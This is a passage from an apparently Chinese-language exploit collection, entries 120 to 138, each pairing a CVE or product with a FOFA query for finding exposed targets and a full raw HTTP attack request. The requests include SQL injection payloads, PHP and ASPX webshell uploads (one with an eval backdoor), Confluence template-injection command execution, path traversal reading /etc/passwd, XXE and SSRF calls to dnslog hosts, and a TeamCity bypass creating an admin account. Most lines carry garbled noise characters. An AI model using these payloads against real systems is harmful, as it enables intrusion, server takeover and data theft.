: U3 w7 ~2 y, d6 _, M7 d, J: f, a( HAccept-Encoding: gzip, deflate
& ^# ]/ `2 E5 Y0 qContent-Type: application/x-www-form-urlencoded;* W8 E7 k! _* r
Content-Length: 109% A$ b  [. x  f
Origin: https://58.18.133.60:8443* W$ |" Z+ K+ C7 F# E
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php; Y) p9 y' B' t/ t% ]
Sec-Fetch-Dest: empty# L" Q3 c: ~" p  `* h# [7 q
Sec-Fetch-Mode: cors
8 \1 p$ O6 [0 t9 eSec-Fetch-Site: same-origin: m: S" K" X  F1 o& d6 L2 V0 s
X-Forwarded-For: 1.1.1.1
4 R1 }( o, O, u' B- Q6 mX-Originating-Ip: 1.1.1.1
. b) o$ D7 Z4 z/ D$ ~X-Remote-Ip: 1.1.1.1
, u( o# Q. G+ {+ oX-Remote-Addr: 1.1.1.17 B0 k- F, U; n
Te: trailers8 y5 B2 I; @: g. @# v
Connection: close% G$ A! P) m9 N# ~# Q! a3 u8 U+ _

6 t  b0 i! j' _: o+ [- Z; |* [src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456+ @7 Q; C% P" C& c9 z$ z

8 b5 U" D$ m5 Z$ W+ k$ t
0 Y* H% F: V3 H0 ]# R* @120. 北京百绰智能S40管理平台导入web.php任意文件上传  N% s; A! h% K
CVE-2024-1253' X$ H5 ~' @2 f5 R0 D
FOFA:title="Smart管理平台"
+ z" C6 V5 M2 l* FPOST /useratte/web.php? HTTP/1.1
0 `2 m6 G+ S/ E. l$ F: L, M' THost: ip:port
8 {# s7 W& D/ `; K3 HCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db/ p% U# B3 L0 y# @, J0 V
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& w, l" F' \5 c$ ]' }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, R5 ~, O1 |- O$ m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 R7 |+ X( H- T! V% n, ?1 I7 S2 F% {/ v: lAccept-Encoding: gzip, deflate: D# H$ }4 V% g; v8 D% q$ y
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) X0 V$ {) `# x* k
Content-Length: 597
% }: [  Z6 }5 F& J, {- ROrigin: https://ip:port  C) }: D9 @; N# E
Referer: https://ip:port/sysmanage/licence.php
: L. t- ~4 b% t- m5 h/ M! ~" u9 _Upgrade-Insecure-Requests: 1
0 C$ p7 k/ a( Y1 J$ ?: U5 \Sec-Fetch-Dest: document
: X: j# D  S; R) l, k5 [Sec-Fetch-Mode: navigate& V1 k' j* V) K; b- ^/ `! |
Sec-Fetch-Site: same-origin
* \  ?+ v6 [' A6 M' ^% ^3 hSec-Fetch-User: ?1$ w% ]8 v5 B* h6 _
Te: trailers$ T# X7 i! R: d. a' f9 G! n
Connection: close
) w& j) |( V2 h  d/ O6 \$ k# x2 a* E) u5 \; f6 ^
-----------------------------42328904123665875270630079328
) }# k! C: a" J8 ~" OContent-Disposition: form-data; name="file_upload"; filename="2.php"! G% G+ x7 ~, ~: w
Content-Type: application/octet-stream
. v/ H9 [! O* [
. m; S8 u. n! `<?php phpinfo()?>+ f; s# _6 A$ ~. P" D( Q
-----------------------------42328904123665875270630079328
% W. H. h9 ?* J: Y3 W6 z2 }Content-Disposition: form-data; name="id_type"
5 R, l+ X" N9 y8 M, W; S" U) x8 v: Q
- y( l( \+ y( T  L# |' v  _12 A- B% {8 S4 I: Y" k) E
-----------------------------42328904123665875270630079328
( s" q5 c/ I$ v; s4 p/ A0 Y+ wContent-Disposition: form-data; name="1_ck"9 P, n+ n7 ~* J3 T. l, m' P! ]* n
# L# n: }7 V2 f
1_radhttp
3 U' x. \4 C! b: c-----------------------------42328904123665875270630079328
% l4 {) b& {- bContent-Disposition: form-data; name="mode"
0 ]: b5 Q, W2 n' \1 O# o# w* T
1 Q2 _; w- G: V) b8 c7 _! H; B, Aimport
, D. W% m* m! m7 q3 ]-----------------------------42328904123665875270630079328
5 g- u" K; |) L+ v$ ~) g' a" `& Z% O: Y) d: O- L

- \: @( o. R8 N文件路径/upload/2.php* f0 V7 u: ^) d* f4 m5 L  p5 |

4 A9 Z5 o) `; k4 d121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ p- ?- Q( [" BCVE-2024-19186 O; i. m) p1 ~
FOFA:title="Smart管理平台". w! A" h; ^' A* c
POST /useratte/userattestation.php HTTP/1.19 g8 u+ S' F7 H) V( t* ~* V
Host: 192.168.40.130:8443
# P2 v2 s' B1 h  a# [, ?% SCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
$ l) e4 m+ n3 Q3 h2 z% l  f7 q5 pUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko( J' \4 o' ^2 u2 B7 ^6 a7 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* }) @( U. D. u$ e; CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 q4 Q# Z) v0 |
Accept-Encoding: gzip, deflate
" b- A% c/ B& K  ~1 M" [Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
- ~' H1 A8 ~/ jContent-Length: 592
! I! u# `3 L4 M+ O, Z% J7 eOrigin: https://192.168.40.130:8443
$ R( w, e$ s( G, O) UUpgrade-Insecure-Requests: 13 x* \1 x' _4 O
Sec-Fetch-Dest: document9 [3 c0 w- U) ~  g! V/ k6 w+ Q; H
Sec-Fetch-Mode: navigate  @8 P. F& c- ]7 X0 s  u- t
Sec-Fetch-Site: same-origin3 j! w% v2 Y( J: U
Sec-Fetch-User: ?1
" t. y) N. d+ {% o; k1 B) WTe: trailers
! d; F# Q/ Z* o; TConnection: close
& v  b% \0 m+ B/ x4 W4 L+ C* P1 ]! m+ M
-----------------------------42328904123665875270630079328
) {9 J1 _5 Q% X# IContent-Disposition: form-data; name="web_img"; filename="1.php"
) k9 I: U$ [& IContent-Type: application/octet-stream$ r% r: s$ Q! j: I; h& x

" D6 _2 O6 z% W3 i<?php phpinfo();?>
. {8 s  ?+ M% ]0 E3 ?. x  g-----------------------------42328904123665875270630079328
9 U: ^+ c0 I$ D! wContent-Disposition: form-data; name="id_type"8 {2 m0 [9 Q* R4 ^: @, ^( G
2 T5 N+ ]  M2 n: f& n* ?' [
1( s; v: [* w9 G% L# C% W
-----------------------------42328904123665875270630079328
& x1 h" v$ v9 RContent-Disposition: form-data; name="1_ck"
" T1 Z  ]6 N9 L: E# d
8 `, @4 c& n- c, F  V2 b  W6 v& I$ w1_radhttp& I# @: g- R0 S! I& ^& [) b* C
-----------------------------42328904123665875270630079328
$ i' y) B# X2 I3 M1 I5 |2 J! D# q5 wContent-Disposition: form-data; name="hidwel"3 {% E: r! g4 \0 Q  O* Y0 L$ A. @* Y

8 v, x9 ?; z3 ~/ m, vset+ v( t$ a: k) G& |
-----------------------------42328904123665875270630079328! n( d' [" \6 ~3 A. S
6 m7 H8 o" z5 m1 y1 U

& x1 k! t4 R0 _; g' b2 b$ i) G  F4 p; nboot/web/upload/weblogo/1.php
* p+ S% Y' M6 P) d
* [3 q: F6 q" d) C5 f122. 北京百绰智能s200管理平台/importexport.php sql注入7 Z! ]$ p& |" u3 ~! x
CVE-2024-27718FOFA:title="Smart管理平台"# g) l( G& Q" @
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()$ U$ S  Q8 C4 }4 s1 n: O
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
9 T% \% }3 y; {, V& s+ ZHost: x.x.x.x  s! o; B& b  ?* s3 u
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc03 g% L. ]1 T; A+ k# @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 u; N1 n' K0 \% u+ MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 G$ C( X4 `6 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 A0 y& H! q) [5 g: L, e1 \# aAccept-Encoding: gzip, deflate, br
1 p9 R, }' L2 ]' H, ^Upgrade-Insecure-Requests: 1
: m: f, H1 F, USec-Fetch-Dest: document
' s5 X1 V3 ~% X1 ?1 }Sec-Fetch-Mode: navigate, y" f, O9 V# a; L
Sec-Fetch-Site: none2 i8 m( m' ~% h% d
Sec-Fetch-User: ?1
" y( P2 Z- N2 C6 c9 s' ]Te: trailers
, h( ?3 C0 Q5 e8 f+ ~1 ^# {* N0 bConnection: close
( ~# d5 [" s+ t. t5 Y$ S4 U
+ z9 \  U7 {, m- m
. c" ?5 b  f2 h; C" f% n; [123. Atlassian Confluence 模板注入代码执行
# t5 k# L3 V  w: EFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
; Y1 N; j4 u; f1 B6 r" L: lPOST /template/aui/text-inline.vm HTTP/1.1
% e7 v  b. w: ^4 rHost: localhost:8090
1 Q+ L- `" g' ~0 AAccept-Encoding: gzip, deflate, br
9 q5 G2 y$ P! p( h4 B: rAccept: */*( [0 g, @% _' \  F8 \  A
Accept-Language: en-US;q=0.9,en;q=0.8
6 r" n5 H. _6 N( mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36# w1 f. \, a' {* T8 V
Connection: close
2 e2 o, a3 v$ ~0 H' m; z5 MContent-Type: application/x-www-form-urlencoded- ?8 t( r8 E' u& e* f5 m

& E3 N$ H( A/ b3 v6 E8 Blabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))6 N) J; {' f7 g

* m. W7 q5 {5 [
5 y0 a% t! H4 I4 `1 W124. 湖南建研工程质量检测系统任意文件上传
2 o2 [( N/ D; k% jFOFA:body="/Content/Theme/Standard/webSite/login.css"
% `  R- t: e" v8 P: C* ~" nPOST /Scripts/admintool?type=updatefile HTTP/1.1
6 ~9 R/ R/ u& G% oHost: 192.168.40.130:8282
4 |/ S3 E9 q9 y. a* ~* G9 RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36) e4 s! Q% B1 q. V$ v$ V/ _
Content-Length: 72/ I( a7 `8 o4 I) R7 P; o1 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
) h4 M$ `% f7 ?- p' h- LAccept-Encoding: gzip, deflate, br2 E* \5 M! g2 T6 F4 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 Q# c- B2 I- ^* J. n5 [) t. \, YConnection: close
4 y. ^8 @, |2 V. NContent-Type: application/x-www-form-urlencoded' a. g! _* N. Z

( {+ e6 J+ J, u# x) r+ |* x/ l% ]filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
/ ]! t4 I4 K) Q" i
; c3 W4 r/ n9 T( Y
. j; d0 L0 @0 e( \http://192.168.40.130:8282/Scripts/abcgcg.aspx: y% g, \: c0 t  r
+ _0 g" M) x8 u* |: g* p
125. ConnectWise ScreenConnect身份验证绕过
  w: t, @* @! }CVE-2024-1709
  {6 q, O) ?2 M6 J& c# n  OFOFA:icon_hash="-82958153"
. m( j, x$ g) _2 P7 t3 b7 [https://github.com/watchtowrlabs ... bypass-add-user-poc
7 y% C1 O6 o2 A! a  D( e: @
$ w! I2 m% O% G$ j' ~
# K* Z8 R1 X! I  V- s9 Z0 b使用方法1 O7 N6 R; ?7 v% g; y
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( c; d5 i- C1 d+ ?- h3 U8 z+ T, @
6 s  |6 C0 P1 G$ z  K! `3 `4 R$ N/ {- m! ^; Y
创建好用户后直接登录后台,可以执行系统命令。
  M( G1 W0 }5 v+ y1 W
+ s4 R6 M- t: Z# ^4 R126. Aiohttp 路径遍历6 f1 M, U; S7 g" d
FOFA:title=="ComfyUI"
4 i( x( |$ N6 X0 v6 d) MGET /static/../../../../../etc/passwd HTTP/1.1
8 `" e6 O$ b6 X1 m5 GHost: x.x.x.x
; G3 R1 |* n; Q; lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 O) w9 D4 s* D+ _2 `8 S
Connection: close; N& p+ t3 t/ ?$ f7 J' A+ u
Accept: */*) e- S- t: O3 k
Accept-Language: en
0 S( @8 \- _3 q* \4 M3 vAccept-Encoding: gzip
+ j: `7 v: R8 K( H  y: X
# R% s  L8 Q& F5 A* K8 ]6 ?2 R( c$ n4 k0 j" Z
127. 广联达Linkworks DataExchange.ashx XXE- B, p/ Q4 t0 v3 |* y  ^
FOFA:body="Services/Identification/login.ashx" 1 p( m3 _# q$ C, c  `
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
: G; `7 s9 [. ~" l. L6 ?, H3 CHost: 192.168.40.130:8888- H# d0 W4 _5 F/ z9 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.368 `$ U% q& z2 P
Content-Length: 4153 V7 D% S. Y0 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 m( U+ W% V3 \3 M! c* EAccept-Encoding: gzip, deflate
5 A: R$ d% l) C- J5 EAccept-Language: zh-CN,zh;q=0.99 M1 K7 H% o3 t3 g4 f, i7 y0 `1 _
Connection: close
" u9 E1 I2 b- J3 U& ]% XContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0# w+ ~7 {2 I% J) }: _' B# ~. [7 P
Purpose: prefetch
6 H* U7 M" ~/ N9 nSec-Purpose: prefetch;prerender
& S* j6 y' }4 U, z# _$ \6 P- k7 ^7 j; j$ J2 S) x3 W0 z4 q
------WebKitFormBoundaryJGgV5l5ta05yAIe00 H, o+ d: f7 z0 D( z8 I2 t$ g
Content-Disposition: form-data;name="SystemName"
8 R7 \& X7 W' [' ?
* d6 `) Z* A, }- S4 z$ kBIM6 ^: F- O+ R2 m' }# g3 I
------WebKitFormBoundaryJGgV5l5ta05yAIe0" [" N* Y7 z. ?6 @$ I
Content-Disposition: form-data;name="Params"/ j2 `6 V# V; ~/ V
Content-Type: text/plain
4 R- b( f' e. M0 m3 d1 q
; D( Q; f5 x* {! w3 O/ m, W<?xml version="1.0" encoding="UTF-8"?>
- B2 l" D" x' k4 u<!DOCTYPE test [
" a% X" g! T) p<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">6 w; W* n" {1 y
]! A) x+ t7 {+ e  v/ O+ e8 \. N4 z
>
( x  k$ w5 W( _8 E/ B& u, U4 y<test>&t;</test>+ _$ x" X. V' o4 z8 j1 j4 t
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
' E  N* U  ]0 w% k/ L. W0 q4 {3 u  L  C( o7 A% `8 z7 s
1 M- N" k$ L! |/ h/ \2 p4 U! t- K6 S
& ?* b! K. {( F; S$ \
128. Adobe ColdFusion 反序列化
$ x* x% f1 N- k3 ]' l& Y$ cCVE-2023-38203
! E8 x; Z9 a; @& P3 O+ x9 sAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)& q6 O  d7 D( S4 I- V
FOFA:app="Adobe-ColdFusion"& u. q6 N. u1 M0 S( ?+ Y
PAYLOAD
" R4 V- H, p' \/ `4 h) K4 t# N9 `5 F: D  i4 M: h) l
129. Adobe ColdFusion 任意文件读取
5 A( G/ [1 ^) R6 ~# ~8 d! D! `  fCVE-2024-20767
4 Z# r* u6 u1 N" d: G) RFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"' |+ a" ~& v5 C% l, ~3 K3 n
第一步,获取uuid
, b) k, x. `- o/ |( cGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
) K: ?8 z) |1 o  `, hHost: x.x.x.x
8 v8 P) `$ A' ~5 B4 G3 A! k( t$ WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ x6 b' \3 ~, X1 [4 U8 ^Accept: */*( y5 y. ~' u) @5 K% p
Accept-Encoding: gzip, deflate% m$ W( V$ c! F( h7 n
Connection: close2 u: |9 T1 N8 k

2 `3 a/ v4 Q2 k- Z0 H. C3 S* O3 @$ Y
第二步,读取/etc/passwd文件; w/ g' `, o' o$ i, @
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
( _: z: b0 h) S1 O4 p  tHost: x.x.x.x0 m8 X( q* T% ^  [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) T' F) B) E$ D) y
Accept: */*) A9 Q" i+ j# {( S7 }) E0 x
Accept-Encoding: gzip, deflate0 P# n) J6 }$ D* [3 s# f  d! Y& Y
Connection: close
/ W) ~; ^4 N% a% U6 _$ K" Cuuid: 85f60018-a654-4410-a783-f81cbd5000b9
& g& o$ B; I) E  N6 `' ^' o. C# U
+ {. B( N+ A1 @+ \8 n, L" O+ `
& a+ ]! b6 D. a( Q& B- R1 K130. Laykefu客服系统任意文件上传$ u+ J! ?: O) k
FOFA:icon_hash="-334624619"
% E$ j( C6 u6 ~/ k  D# yPOST /admin/users/upavatar.html HTTP/1.1
- v  d7 `8 h: ]6 D% j) C* \( ^Host: 127.0.0.1
, o3 Z$ b' x8 r. g6 hAccept: application/json, text/javascript, */*; q=0.01
/ N" v4 M  u. H) @" q  Z' aX-Requested-With: XMLHttpRequest
( h4 ~# I5 W( A, M5 x: e/ LUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26* }0 K' H$ x7 v6 V& K9 g/ A% j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR, l5 e/ A/ h2 Z+ ?8 B5 e
Accept-Encoding: gzip, deflate7 D! r( ^  p) |2 Z4 [0 {; i
Accept-Language: zh-CN,zh;q=0.9% S7 R- M+ E; w- z" o0 f' k' M  X0 B# S
Cookie: user_name=1; user_id=3
! ?$ P: [) G* w8 f- K2 h( D; kConnection: close$ O3 ?2 Q; e1 I- U/ D9 i

8 u& Y1 _8 |# d! i8 ~------WebKitFormBoundary3OCVBiwBVsNuB2kR/ A7 X( E* Y8 N' M6 d
Content-Disposition: form-data; name="file"; filename="1.php"
! V0 S9 a$ I" h# ^9 `, qContent-Type: image/png
9 U# n% f: w9 q0 z; n. W& F 6 a& {. J2 \; w' y
<?php phpinfo();@eval($_POST['sec']);?>" [# p: X  b4 Q5 T" T+ \7 F
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
1 S( X: F; J5 U! q1 Z2 n% q1 m( Z+ \/ O+ Z) i5 I- J& j0 ^

: g- n% _* e( o; j  ]& d. N: X" C131. Mini-Tmall <=20231017 SQL注入1 u" p4 B; a0 P
FOFA:icon_hash="-2087517259"
( F7 l. K# n9 @后台地址:http://localhost:8080/tmall/admin# F- G. o8 C. N1 k- L0 [8 i
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
9 W; [' H! M2 o( N; R- M0 U. M# _# E7 M% K& k* m
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
! J/ L& D! o" h$ p- B0 A; ]CVE-2024-271987 l: [5 E& ?3 I3 c0 |  g! ~
FOFA:body="Log in to TeamCity"
' H/ S* B3 ~9 o* {; M1 gPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1- |# B, }; b1 n: C6 X$ v
Host: 192.168.40.130:8111
1 f8 T" n" b' a& xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 v9 ?% v8 U, \$ s# a' LAccept: */*! ]' M+ W. Q" g) n
Content-Type: application/json
0 x  [: r; W( L. A+ hAccept-Encoding: gzip, deflate2 X* C7 d/ q, Q) D& ]
9 ?2 k' L$ R0 [) v1 q: w& ]
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}! x6 K3 r7 m8 b

# I0 O3 L" Z: R" t$ V) m' ~. m
* r$ E/ N4 ~3 ?, QCVE-2024-27199- m. E( t& b7 M" K7 b! b' Y
/res/../admin/diagnostic.jsp
3 n2 Z8 r9 x' c- ~* _/.well-known/acme-challenge/../../admin/diagnostic.jsp# U3 U* r8 I' q4 c, Y! d+ C; @1 R0 G
/update/../admin/diagnostic.jsp- n9 U- L2 h/ V5 G. z, i* X5 O' M
! r- @: b) [% O: b
! _, A7 a6 g% ~$ B  }- X
CVE-2024-27198-RCE.py1 p0 J3 O; N8 Y- b

& j' R! Q/ l* T' r: o133. H5 云商城 file.php 文件上传
9 _9 p: j( r* l. V# d/ w" T- uFOFA:body="/public/qbsp.php"$ m+ T9 x8 x$ K6 P
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1. U- m3 d. c% S+ C
Host: your-ip" A& [% t% ~/ q% a! Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
; ~, N" _' D! p% z( T- O9 c& ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx  a& {0 k# e# u) E$ K* i

0 w  A; t$ Y3 Y, j' x. B1 m------WebKitFormBoundaryFQqYtrIWb8iBxUCx
+ i( x! p- J% `Content-Disposition: form-data; name="file"; filename="rce.php"7 t" C* t+ G: Y2 Z( o
Content-Type: application/octet-stream9 |- u( @! Z# R4 I  N# G
& `7 m3 b$ Q# a1 \3 z! B/ t
<?php system("cat /etc/passwd");unlink(__FILE__);?>" t" }' l7 ~6 u. V: h
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--, g. {2 e1 L4 J' F% p
: s6 b5 m% W4 I. Y+ v4 O. C

* M8 G9 c: l5 A0 l" C. w2 O: L+ [: F3 ?0 j
134. 网康NS-ASG应用安全网关index.php sql注入" G6 x3 {/ v" M8 ~3 K
CVE-2024-2330
- k8 z' N0 b5 o; TNetentsec NS-ASG Application Security Gateway 6.3版本
, F$ B" }. m% HFOFA:app="网康科技-NS-ASG安全网关"; ^+ t. B- e6 @* O% |# P' a
POST /protocol/index.php HTTP/1.1! H6 l, E" ]" C! ~- T8 C0 {7 q4 v! }
Host: x.x.x.x
3 Y+ ?# K" X$ m. A/ i+ N* ]/ h$ B# ICookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de! p/ J  M% \- {/ K5 ^8 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
3 b' _4 j0 w- C4 v% `  J8 `Accept: */*
& C) c+ v$ U* |) D2 j9 t4 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ |3 u  i: k* W! N9 n  j  wAccept-Encoding: gzip, deflate4 W* e6 p0 v% m: N3 {/ Z; r
Sec-Fetch-Dest: empty
, k7 t% e  ?: b# ~Sec-Fetch-Mode: cors
: ?, ]6 v) a/ w) e- \0 f4 cSec-Fetch-Site: same-origin
0 i5 ~* s" N- z: ]- uTe: trailers# b, K5 @6 t" s. I. F7 D! f
Connection: close( n. y/ c# N; X
Content-Type: application/x-www-form-urlencoded# k. i; h  g+ n" K+ z4 c9 H
Content-Length: 263
$ |5 D9 H% U7 T+ ^% [) h
0 ?- s* h7 K: q" k3 R' x0 t, Yjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}; v9 m' M, N* E
$ @: r5 K% S/ b  T% e
& a$ _! T& v& I( l. j
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入8 D0 p7 s; N$ ~4 L. A  W& N  y; O7 D
CVE-2024-2022, G) ~4 G) B9 j
Netentsec NS-ASG Application Security Gateway 6.3版本
  B" ^5 e3 a. U6 y. Z; mFOFA:app="网康科技-NS-ASG安全网关"8 c* G1 U- r% d4 [* x
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1* r# R0 L8 ?# }% h& ^! `, d2 J' l4 V
Host: x.x.x.x
( H2 H3 b" Q9 x" E+ T) p- TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 D) Z' w% W( g4 [1 R/ {5 q- c/ G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- }5 \0 O$ x" p5 ~
Accept-Encoding: gzip, deflate: l. b6 e; a6 s5 f+ w  H# L; F0 j
Accept-Language: zh-CN,zh;q=0.9
: o, F' l! P8 I6 p: N$ U* j( YConnection: close* }0 R$ `. ~% {& ]$ V2 N

8 i) P2 i% R( X. u3 S1 j! Y9 S+ |2 ~& J' a) q) l, s
136. NextChat cors SSRF
4 W4 K- r9 @. x4 {/ n* n/ kCVE-2023-497850 Y4 J7 T! Z. N. r5 A! @0 I' o
FOFA:title="NextChat"/ c. |8 o& z( u4 V9 W' @" i
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
) |6 b4 Q* j- m* cHost: x.x.x.x:10000
, y& ?. \+ `& {; j& U3 G) {  qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- C' ?) E7 k/ L$ hConnection: close$ ~# c' D/ v2 s& W6 W
Accept: */*
! c$ Z6 z/ z* t- B* D5 XAccept-Language: en- S4 w' K2 z2 g6 K% ]4 q; \
Accept-Encoding: gzip4 Y! U. X  c( H. F

4 \3 P2 g% C6 K/ }) l, @" n& p" ~# w* H( e7 J, P/ e" ]' J
137. 福建科立迅通信指挥调度平台down_file.php sql注入  r0 H7 u. A$ J6 X: F2 `  f1 Q2 i8 b% g
CVE-2024-2620
, h- T: t1 r% z* g6 KFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: ^" ]) `8 Q0 D7 D; Z8 hGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.10 x% m5 m) w6 W! }: C4 y6 r
Host: x.x.x.x
/ X1 [  `8 J+ d, s. a" U! ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
  G: B' [5 t: iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 h  w  d/ y2 y* OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' [' A4 V$ G; b/ ~7 J0 A% x$ FAccept-Encoding: gzip, deflate, br& i2 L, [4 [( e& H5 c6 o* d
Connection: close) C: w5 z5 c& ]3 N7 M3 o$ A2 N
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj- C2 z8 Q  ?4 [) n. h
Upgrade-Insecure-Requests: 15 `& Z$ d$ Y% e; A, N

4 [. C7 j- x; j! {* c4 G. Q" \$ |6 S, b. m! q) G1 K% X
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
, M5 d  g4 k( t! b. w! CCVE-2024-2621( z5 t/ p! O" F; d3 k1 E2 ]0 r
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
# ]. x8 a3 }6 DGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1* O: B9 B5 T0 ~% ?. k( B
Host: x.x.x.x
